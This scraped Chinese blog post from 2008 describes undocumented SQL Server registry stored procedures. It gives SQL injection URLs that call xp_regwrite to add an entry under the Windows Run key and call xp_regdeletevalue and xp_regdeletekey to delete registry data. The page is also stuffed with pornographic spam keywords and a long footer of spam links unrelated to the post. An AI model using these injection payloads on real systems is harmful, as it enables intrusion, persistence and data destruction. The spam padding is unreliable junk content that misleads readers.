<output id="qn6qe"></output>

    1. <output id="qn6qe"><tt id="qn6qe"></tt></output>
    2. <strike id="qn6qe"></strike>

      亚洲 日本 欧洲 欧美 视频,日韩中文字幕有码av,一本一道av中文字幕无码,国产线播放免费人成视频播放,人妻少妇偷人无码视频,日夜啪啪一区二区三区,国产尤物精品自在拍视频首页,久热这里只有精品12

      SQL Server中未公布的擴展存儲過程注入

       SQL Server中未公布的擴展存儲過程注入
      很多人也許并不了解,在SQL Server中包含了幾個可以訪問系統注冊表的擴展存儲過程。但實際上這幾個擴展存儲過程都是未公開的,從SQL Server 7.0就有了,在SQL server 2000中仍然保留,他們以后可能會刪除.但是這幾個存儲過程卻提供了在當前的SQL Server版本中訪問系統注冊表的能力,

      而且很多人利用SQL Server來進行攻擊系統時,往往都會用到這幾個擴展存儲過程.所以最好在SQL Server中禁用他們。

      假如http://127.0.0.1/view.asp?id=165存在SQL Server的sql注入,我們可以用xp_regwrite寫入注冊表。

      使用方法:


      xp_regwrite 根鍵,子鍵, 值名, 值類型, 值
      http://127.0.0.1/view.asp?id=165; exec
      master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','
      SOFTWARE/Microsoft/Windows/CurrentVersion/run','
      TestValueName','reg_sz','hello'


      注釋:值類型有兩種REG_SZ 表示字符型,REG_DWORD 表示整型(用xp_regdeletevalue刪除某個值)。

      使用方法:


      xp_regdeletevalue 根鍵,子鍵,值名
      http://127.0.0.1/view.asp?id=165; exec master.
      xp_regdeletevalue 'HKEY_LOCAL_MACHINE','
      SOFTWARE/Microsoft/Windows/CurrentVersion','TestValueName'

      xp_regdeletekey 刪除鍵,包括該鍵下所有值


      使用方法:


      http://127.0.0.1/view.asp?id=165; exec
      master.xp_regdeletekey 'HKEY_LOCAL_MACHINE','
      SOFTWARE/Microsoft/Windows/CurrentVersion/Testkey'

      posted @ 2008-08-28 20:36  .NET快速開發框架  閱讀(261)  評論(0)    收藏  舉報
      主站蜘蛛池模板: 国产日韩av二区三区| 麻豆亚洲自偷拍精品日韩另| 久久人体视频| 884aa四虎影成人精品| 97久久精品无码一区二区天美| 成年午夜无码av片在线观看| 人人妻人人狠人人爽天天综合网| 色综合久久中文字幕综合网| 久久久亚洲欧洲日产国码二区| 国产午夜福利小视频在线| 四虎影视一区二区精品| 国产国产午夜福利视频| 天堂网在线.www天堂在线资源| 色综合中文综合网| 日本一区二区三区小视频| 在线看av一区二区三区| 国产欧美久久一区二区| 精品人妻av区乱码| 久女女热精品视频在线观看| 中文字幕久久国产精品| 亚洲人成电影在线天堂色| 国内极度色诱视频网站| 久久精品国产99久久六动漫| 97精品国产91久久久久久久| 国产偷国产偷亚洲清高动态图| 日本黄色一区二区三区四区 | 日本一区二区三区四区黄色| 国产成人无码www免费视频播放| 精品亚洲香蕉久久综合网| 国产黑色丝袜在线播放| 天堂网av最新版在线看| 亚洲男女羞羞无遮挡久久丫 | 波多野结衣在线精品视频| 国产成人精品性色av麻豆| 亚洲成a人片在线观看中| 久久人人97超碰精品| 玩弄放荡人妻少妇系列| 日本一区二区三区专线| 国产日韩精品一区在线不卡| 18禁免费无码无遮挡不卡网站| 国产无遮挡免费视频免费|